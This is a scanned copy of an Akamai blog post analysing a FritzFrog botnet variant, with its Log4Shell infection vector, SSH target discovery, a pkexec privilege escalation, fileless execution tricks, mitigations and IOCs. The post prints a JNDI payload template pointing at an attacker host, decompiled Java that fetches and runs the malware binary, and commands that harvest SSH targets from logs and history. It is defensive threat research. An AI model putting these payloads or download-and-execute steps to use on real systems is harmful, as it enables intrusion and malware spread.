www.akamai.com Open in urlscan Pro
2a02:26f0:480:985::b63 Public Scan

Back to summary

URL:
https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
Submission: On February 05 via api (February 5th 2024, 1:32:57 pm UTC) from DE — Scanned from DE

Form analysis
2 forms found in the DOM

<form role="combobox" aria-expanded="false" aria-haspopup="listbox" aria-labelledby="downshift-0-label">
  <div class="sui-search-box">
    <div class="sui-search-box__wrapper"><input aria-autocomplete="list" aria-labelledby="downshift-0-label" autocomplete="off" id="downshift-0-input" placeholder="Search" class="sui-search-box__text-input " aria-label="Search"
        value=""><label></label></div>
  </div>
</form>

<form role="combobox" aria-expanded="false" aria-haspopup="listbox" aria-labelledby="downshift-1-label">
  <div class="sui-search-box">
    <div class="sui-search-box__wrapper"><input aria-autocomplete="list" aria-labelledby="downshift-1-label" autocomplete="off" id="downshift-1-input" placeholder="Search" class="sui-search-box__text-input " aria-label="Search"
        value=""><label></label></div>
  </div>
</form>

Text Content

Twitter LinkedIn Email

X
Skip to main content

Need cloud compute? Get started now

Close Button
+49-8994006308
Login
Control Center
Access the Akamai platform
Cloud Manager
Manage your cloud resources
en
* English
* Deutsch
* Español
* Français
* Italiano
* Português
* 中文
* 日本語
* 한국어

Try Akamai
Under Attack?
Back
1. Products
2. Solutions
3. Why Akamai
4. Resources
5. Partners
6. Contact Us

+49-8994006308
Back

PRODUCTS

Back
1. Cloud Computing
2. Security
3. Content Delivery
4. All Products and Trials
5. Global Services

+49-8994006308
Back

CLOUD COMPUTING

Learn more
Create a Cloud Account

COMPUTE

Build, release, and scale faster with VMs for every workload

See all

NETWORKING

Secure your network, balance traffic, control your infrastructure

See all

CONTAINERS

Efficiently orchestrate containerized applications

See all

DEVELOPER TOOLS

Get the most out of your applications with advanced management tools

See all

STORAGE

Deploy dependable, easily accessible storage and management

See all

DATABASES

Scale easily with simple and reliable managed databases

See all
Create a Cloud Account

SECURITY

Learn more

APP AND API SECURITY

API SECURITY

Discover and monitor API behavior to respond to threats and abuse

APP & API PROTECTOR

Protect web apps and APIs from DDoS, bots, and OWASP Top 10 exploits

CLIENT-SIDE PROTECTION & COMPLIANCE

Assist with PCI compliance and protect against client-side attacks

ZERO TRUST SECURITY

AKAMAI GUARDICORE SEGMENTATION

Mitigate risk in your network with granular, flexible segmentation

SECURE INTERNET ACCESS

Proactively protect against zero-day malware and phishing

HUNT

Stop the most evasive threats with proactive threat hunting

ENTERPRISE APPLICATION ACCESS

Granular application access based on identity and context

AKAMAI MFA

Harden against account takeovers and data breaches with phish-proof MFA

ABUSE AND FRAUD PROTECTION

ACCOUNT PROTECTOR

Mitigate account abuse and grow your digital business

AUDIENCE HIJACKING PROTECTOR

Retain site visitors, maximize conversions, and reduce affiliate fraud

BRAND PROTECTOR

Detect and mitigate fraudulent representations of your brand

BOT MANAGER

Welcome the bots you want and mitigate those you don’t

IDENTITY CLOUD

Add secure, cloud-based identity management to your websites or apps

INFRASTRUCTURE SECURITY

EDGE DNS

External authoritative solution for your DNS infrastructure

PROLEXIC

Protect your infrastructure from distributed denial-of-service attacks

CONTENT DELIVERY

Learn more

APPLICATION PERFORMANCE

ION

Improve the performance and reliability of your website at scale

API ACCELERATION

Improve the performance and reliability of your APIs at scale

MEDIA DELIVERY

ADAPTIVE MEDIA DELIVERY

High-quality video delivery for any screen to global audiences

DOWNLOAD DELIVERY

Deliver large file downloads flawlessly, every time, at global scale

DEDICATED DELIVERY

Deliver broadcast-quality video while maximizing network efficiency

EDGE APPLICATIONS

EDGEWORKERS

Execute custom JavaScript at the edge, near users, to optimize UX

EDGEKV

Distributed key-value store database at the edge

IMAGE & VIDEO MANAGER

Automatically optimize images and video for every user, on any device

MEDIA SERVICES LIVE

Reliably ingest and deliver low-latency live video at global scale

CLOUDLETS

Predefined apps that run at the edge for specific business needs

CLOUD WRAPPER

Use an efficient caching layer to improve origin offload

GLOBAL TRAFFIC MANAGEMENT

Optimize performance with intelligent load balancing

MONITORING, REPORTING, AND TESTING

DATASTREAM

Low-latency data feed for visibility and ingest into third-party tools

MPULSE

Measure the business impact of real user experiences in real time

CLOUDTEST

Site and application load testing at global scale

SOLUTIONS

Back
1. Use Cases
2. Industry Solutions

+49-8994006308
Back

USE CASES

CLOUD COMPUTING

MEDIA

Deliver an engaging, interactive video experience

SAAS

Build with portability, performance, and efficiency from cloud to client

GAMING

Improve the gamer experience with low latency and high availability

SECURITY

APPS AND APIS

Protect your brand by securing apps and APIs from persistent threats

ZERO TRUST

Deploy one platform for comprehensive coverage and deep visibility

DDOS PROTECTION

Protect your infrastructure from DDoS and DNS attacks

ABUSE AND FRAUD PROTECTION

Stop account abuse, sophisticated bot attacks, and brand impersonation

CONTENT DELIVERY

APP AND API PERFORMANCE

Improve user engagement through app & API optimization

MEDIA DELIVERY

Deliver seamless streaming and download experiences to any device

EDGE COMPUTE

Build and deploy on the world’s most distributed edge platform

INDUSTRY SOLUTIONS

MEDIA AND ENTERTAINMENT

RETAIL, TRAVEL, AND HOSPITALITY

FINANCIAL SERVICES

HEALTHCARE AND LIFE SCIENCES

PUBLIC SECTOR

GAMING

IGAMING AND SPORTS BETTING

PUBLISHING

NETWORK OPERATOR

WHY AKAMAI

COMPANY

Discover how we power and protect life online

Learn more

OUR PLATFORM

Explore Akamai Connected Cloud

Learn more

RESOURCES

Back
1. Library
2. Learn
3. Developer Resources
4. Blog
5. Events

+49-8994006308
Back

LIBRARY

See all

PRODUCT BRIEFS

REFERENCE ARCHITECTURES

CUSTOMER STORIES

EBOOKS

WHITE PAPERS

WEBINARS

VIDEOS

LEARN

AKAMAI SECURITY RESEARCH

Insights and intelligence from the Akamai Security Intelligence Group

STATE OF THE INTERNET REPORTS

In-depth analysis of the latest cybersecurity research and trends

LEARNING HUB

Educational resources and training for Akamai products and services

GLOSSARY

Key concepts in security, cloud computing, and content delivery

PARTNERS

Back
1. Find a Partner
2. Become a Partner
3. Cloud Computing Marketplace

+49-8994006308
Back

FIND A PARTNER

WHY CHOOSE AN AKAMAI PARTNER

Learn about our industry-leading ecosystem of partners

BECOME A PARTNER

CHANNEL PARTNERS

Unlock more profit, focus on what matters, and deliver with confidence

TECHNOLOGY PARTNERS

Create more value for joint customers with seamless integrations

CONTACT SALES

Have questions? We can help.

CUSTOMER SUPPORT

Need technical support? We are here 24/7.

Get support

Login
Control Center
Access the Akamai platform
Cloud Manager
Manage your cloud resources
en
* English
* Deutsch
* Español
* Français
* Italiano
* Português
* 中文
* 日本語
* 한국어

1. Blog
2. Security Research
3. Frog4Shell — FritzFrog Botnet Adds One-Days to Its Arsenal

FROG4SHELL — FRITZFROG BOTNET ADDS ONE-DAYS TO ITS ARSENAL

Written by

Ori David

February 01, 2024

Written by

Ori David

Ori David is a Security Researcher at Akamai. His research is focused on
offensive security, malware analysis, and threat hunting.

Editorial and additional commentary by Tricia Howard

EXECUTIVE SUMMARY

* The Akamai Security Intelligence Group (SIG) has uncovered details about a
new variant of the FritzFrog botnet, which abuses the 2021 Log4Shell
vulnerability.

* Over the years we have seen more than 20,000 FritzFrog attacks, and 1,500+
victims.

* The malware infects internet-facing servers by brute forcing weak SSH
credentials. Newer variants now read several system files on compromised
hosts to detect potential targets for this attack that have a high likelihood
of being vulnerable.

* The vulnerability is exploited in a brute-force manner that attempts to
target as many vulnerable Java applications as possible.

* The malware also now also includes a module to exploit CVE-2021-4034, a
privilege escalation in the polkit Linux component. This module enables the
malware to run as root on vulnerable servers.

* We have included indicators of compromise (IOCs) and additional mitigation
measures in this blog post to assist in the prevention of FritzFrog
infection.

Hop to mitigations

BACKGROUND ON FRITZFROG

Akamai is continuously monitoring threats via our global network of sensors,
including threats we previously discovered. Among these is the FritzFrog botnet
(originally identified in 2020) a sophisticated, Golang-based peer-to-peer
botnet compiled to support both AMD- and ARM-based machines. The malware is
actively maintained and has evolved over the years by adding and improving
capabilities.

FritzFrog has traditionally hopped around by using SSH brute force, and has
successfully compromised thousands of targets over the years as a result. Each
compromised host becomes part of FritzFrog’s network — it communicates with its
infected peers to share information, payloads, and configuration.

Thanks to the consistent upkeep, the malware includes many interesting features
in its arsenal, including the additions we’ll discuss in this blog, such as the
introduction of Log4Shell exploitation. For example, it attempts to avoid
touching the disk to limit detection opportunities, supports communication over
TOR, and even has an “AntiVirus” module that kills competing malware.

USING LOG4SHELL AS AN INFECTION VECTOR

Traditionally, FritzFrog relied on SSH brute force as its sole infection vector,
but recent versions of the malware now include a new one: Log4Shell
exploitation, which in our pond is known as the toadally rad “Frog4Shell”.

The Log4Shell vulnerability was initially identified in December 2021 and
triggered an industry-wide patching frenzy that lasted for months. Even today, 2
years later, there are many internet-facing applications that are still
vulnerable to this exploit.

Vulnerable internet-facing assets are a serious problem, but FritzFrog actually
poses a risk to an additional type of assets — internal hosts. When the
vulnerability was first discovered, internet-facing applications were
prioritized for patching because of their significant risk of compromise.
Contrastly, internal machines, which were less likely to be exploited, were
often neglected and remained unpatched — a circumstance that FritzFrog takes
advantage of.

As part of its spreading routine, the malware attempts to target all hosts in
the internal network. It does so by calling the net__Interface_Addrs standard Go
function to identify reachable subnets and target the possible addresses in each
of them. In Figure 1, we can see the malware attempting to connect to all the
addresses in the local network.

Fig. 1: FritzFrog scanning the local network to identify targets

This means that even if the “high-profile” internet-facing applications have
been patched, a breach of any asset in the network by FritzFrog can expose
unpatched internal assets to exploitation.

FritzFrog identifies potential Log4Shell targets by looking for HTTP servers
over ports 8080, 8090, 8888 and 9000. To trigger the vulnerability, an attacker
needs to force the vulnerable log4j application to log data containing a payload
(Table 1):

${jndi:ldap://<attacker_address>/<payload>}

Copy

Table 1: Log4Shell payload example

This payload, which is incorrectly parsed by the vulnerable log4j library,
forces the Java application to connect to an LDAP server specified in
“attacker_address”, download a Java class from it, and execute it (Figure 2).

Fig. 2: The general Log4Shell exploitation flow

FritzFrog attempts to exploit this vulnerability by injecting the payload
through HTTP headers (Figure 3). It does so in an interesting manner — rather
than attempting to surgically target a specific HTTP header, FritzFrog targets
pretty much all of them.

Fig. 3: FritzFrog Log4Shell exploit embedded inside various HTTP headers

FritzFrog sends the Log4Shell payload in numerous HTTP headers, hoping that at
least one of them gets logged by the application. This brute force exploitation
approach aims to be a generic Log4Shell exploit that can affect a wide variety
of applications.

The injected payload seen in Figure 3 makes the application connect back to
FritzFrog’s own IP address — the malware hosts its own LDAP server that is used
to serve the malicious Java class. Upon execution, the Java class will connect
to the attacking machine over HTTP to download the malware binary that is hosted
under the name “robots.txt” (Table 2).

String ff_host_http_server_address = ff_host_http_server_address.trim();
payload_url = new URL("http://" + ff_host_http_server_address + "/" +
ff_username + "/robots.txt");
payload_url_stream = payload_url.openStream();

Copy

Table 2: Decompiled Log4Shell Java payload downloading the FritzFrog binary

The “robots.txt” file is saved under the name “ifconfig”. The Java class will
then execute the ifconfig binary and delete the file (Table 3).

FileOutputStream ff_payload_file = new FileOutputStream(paths[counter] + "ifconfig");
ff_payload_file.write(var2.toByteArray());
ff_payload_file.close();
ff_payload_file_exec = new File(paths[counter] + "ifconfig");
ff_payload_file_exec.setExecutable(true);
Process ff_proc = Runtime.getRuntime().exec(paths[counter] + "ifconfig init " + var9 + ":22 " + ff_username + " exploit_log4shell");
if (ff_proc.waitFor() == 0) {
ff_payload_file_exec.delete();
return;
}

Copy

Table 3: Decompiled Log4Shell Java payload executing the FritzFrog binary

Figure 4 illustrates the Log4Shell exploitation flow used by FritzFrog.

Fig. 4: FritzFrog Log4Shell exploit process

SSH TARGET DISCOVERY METHODS

In addition to adding Log4Shell exploitation, FritzFrog also improved its
ability to identify targets for its main infection vector — SSH brute force.
While continuing to target randomly generated IP addresses, FritzFrog will now
also attempt to identify specific SSH targets by enumerating several system logs
on each of its victims.

AUTH LOGS

The Linux auth.log files contain, among other things, information about
connections to the machine. FritzFrog targets active clients in the network by
scanning these logs and looking for IP addresses. To access the data, the
malware executes the following commands:

cat /var/log/auth*

zcat /var/log/auth*

These commands will output the content of all the cleartext and compressed log
files.

SSH KNOWN HOSTS

When a host connects to a remote SSH server, the connection information is
automatically saved to the ~/.ssh/known_hosts file. FritzFrog will extract the
addresses of these hosts and target them.

This provides the malware with a list of active and reachable SSH servers.
Moreover, since these servers are likely managed by the same owner as the
compromised server, they also may share a similar weak password.

HISTORY FILE

All commands that are executed on Linux systems are saved in a special log
called the history file. FritzFrog attempts to identify previous ssh and scp
connections by executing the following command:

history | grep -E \"(scp|ssh)\"

FritzFrog will then extract the IP addresses from these commands and target
them. Similar to the known_hosts file, this can provide a list of active and
reachable SSH servers.

PRIVILEGE ESCALATION

Another change that we observed was the addition of a privilege escalation
capability to the malware. On its initial execution, FritzFrog will check the
permissions of its process. If the executing user is not root, a function called
“main_RunBlasty” will be called (Figure 5).

Fig. 5: FritzFrog determines that the process is not running as root and
executes the “main_RunBlasty” function

The “RunBlasty” function begins with the execution of the “which” command — a
utility that enables locating the full path of other commands on the system
(Figure 6).

Fig. 6: FritzFrog “which” command execution

We can see that the malware attempts to find the location of the pkexec binary.
(Ring any vulnerability-related bells, aka vulneraBELLities?)

The malware then extracts two files that are embedded inside its own executable
(Figure 7); the files are stored as strings, which are Base64-encoded gzipped
files. The extracted files are called blasty and payload.so.

Fig. 7: Extracting the files embedded in the malware binary

After creating the files, FritzFrog executes blasty — an ELF that was written in
C. If we take a look at its code, we see that it is very simple — some
interaction with environment variables, followed by the execution of pkexec
(Figure 8).

Fig. 8: blasty disassembled code

Searching for these strings immediately leads us to this exploit code for
CVE-2021-4034. This vulnerability in the polkit Linux component was disclosed by
Qualys in 2022, and could allow privilege escalation on any Linux machine that
was running polkit. Since it is installed by default on most Linux
distributions, many unpatched machines are still vulnerable to this CVE today.

The exploit works by abusing the fact that pkexec is a SUID program; that is, it
runs with root privileges even when executed by a weak user. The vulnerability
enables forcing pkexec to load and execute an attacker-controlled library,
leading to code execution as root.

Blasty exploits this vulnerability, making pkexec load and execute payload.so.
As we can see in Figure 9, this library will set the uid and gid of the process
to 0, meaning root, and execute root_update — FritzFrog’s binary.

Fig. 9: payload.so executing FritzFrog as root

Another interesting note is that blasty and payload.so are both compiled for the
AMD64 architecture, even for FritzFrog variants that run on ARM. This means that
the exploit will fail to run on any machines that don't run on an AMD64 CPU.

DEFENSE EVASION

FritzFrog continues to employ tactics to remain hidden and avoid detection. In
particular, it takes special care to avoid dropping files to disk when possible.
We have seen the developers use two Linux features to achieve this: /dev/shm and
memfd_create.

/DEV/SHM

The first technique uses the /dev/shm folder (with shm meaning shared memory),
which is a directory that is meant to enable efficient communication among
different processes on the system (Figure 10). While it seems like a normal
filesystem folder, /dev/shm is actually mapped directly to the RAM, and all
files created under it never actually touch the disk.

FritzFrog uses this folder to enable fileless execution by writing files and
executing them from /dev/shm. To monitor this activity, we can execute the
malware and use the inotifywait utility to inspect file operations in /dev/shm.
We see that the malware writes several files to this directory; for example, in
Figure 8 the malware is seen writing all the pkexec exploit files to /dev/shm
before executing them.

Fig. 10: Monitoring FritzFrog file access events to the /dev/shm directory

MEMFD_CREATE

The second technique uses the memfd_create function, described in the man page
as follows:

memfd_create() creates an anonymous file and returns a file descriptor that
refers to it. The file behaves like a regular file, and so can be modified,
truncated, memory-mapped, and so on. However, unlike a regular file, it lives
in RAM.

So, similarly to the previous technique, we get a convenient way to create a
file without touching the disk. FritzFrog uses this technique when executing its
miner payload (Figure 11) — it writes the payload into an anonymous file created
by memfd_create and executes it.

Fig. 11: FritzFrog using memfd_create to write the miner payload into an
anonymous file

MITIGATIONS

We recommend the following two mitigation strategies: using network segmentation
and detecting the common malware tactics, techniques, and procedures.

1. Network segmentation can limit the potential impact of FritzFrog by
preventing lateral movement. Software-based segmentation can be a relatively
simple solution to spin up that has a long-lasting defensive impact.

2. We have provided a FritzFrog detection script to run on SSH servers that
looks for the following FritzFrog indicators:

a. Running processes named nginx, ifconfig, php-fpm, apache2, or libexec,
whose executable file no longer exists on the file system (as seen below)

b. Listening port 1234

CONCLUSION

The shift in tactics toward exploitation was a major trend for threat actors in
2023 — one-day and zero-day exploits were used extensively and proved to be some
of the most effective methods to breach into organizations.

FritzFrog’s addition of exploitation capabilities to its arsenal shows a similar
shift in this direction. The additional infection vector that is abusing the
Log4Shell vulnerability, and the pkexec exploit module are two additions
explored in this blog post that exemplify this shift. We believe that this trend
will continue in upcoming FritzFrog versions, and it's likely only a matter of
time before additional exploits are added to the malware.

The Akamai SIG will continue to monitor this threat and others like it and
publish our findings. To keep up with FritzFrog updates and other security
research, you can follow us on X (formerly Twitter).

See more research

IOCS

FRITZFROG BINARY

AMD

f77ab04ee56f3cd4845d4a80c5817a7de4f0561d976d87563deab752363a765d

ARM

fb3371dd45585763f1436afb7d64c202864d89ee6cbb743efac9dbf1cefcc291

LOG4SHELL PAYLOAD

52b11d3fa9206f51c601bd85cb480102fd938894b7274fac3d20915eb3af44f8

“BLASTY” PKEXEC EXPLOIT

BLASTY

85cb8ceda7d2a29bc7c6c96dd279c43559797a624fc15d44da53ca02379afe01

PAYLOAD.SO

0b95071c657f23d4d8bfa39042ed8ad0a1c1bceb6b265c1237c12c4c0818c248

--------------------------------------------------------------------------------

* Cyber Security
* Research
* Threat Intelligence
* Security Research

--------------------------------------------------------------------------------

Written by

Ori David

February 01, 2024

Written by

Ori David

Ori David is a Security Researcher at Akamai. His research is focused on
offensive security, malware analysis, and threat hunting.

www.akamai.com Open in urlscan Pro 2a02:26f0:480:985::b63 Public Scan

Form analysis 2 forms found in the DOM

Text Content

www.akamai.com Open in urlscan Pro
2a02:26f0:480:985::b63 Public Scan

Form analysis
2 forms found in the DOM